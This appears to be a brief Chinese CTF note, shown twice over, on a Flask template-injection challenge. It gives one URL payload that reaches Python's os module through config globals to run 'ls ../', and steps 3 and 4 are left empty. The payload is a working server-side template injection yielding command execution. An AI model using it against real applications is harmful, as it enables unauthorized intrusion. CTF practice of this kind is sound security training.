一、前言
做笔记使用
二、思路
1、打开查看题目
2、构造语句
可以看出是用的python的flask模板,开始构造语句进行注入
http://114.67.175.224:17417/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
3、
4、
一、前言
做笔记使用
二、思路
1、打开查看题目
2、构造语句
可以看出是用的python的flask模板,开始构造语句进行注入
http://114.67.175.224:17417/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
3、
4、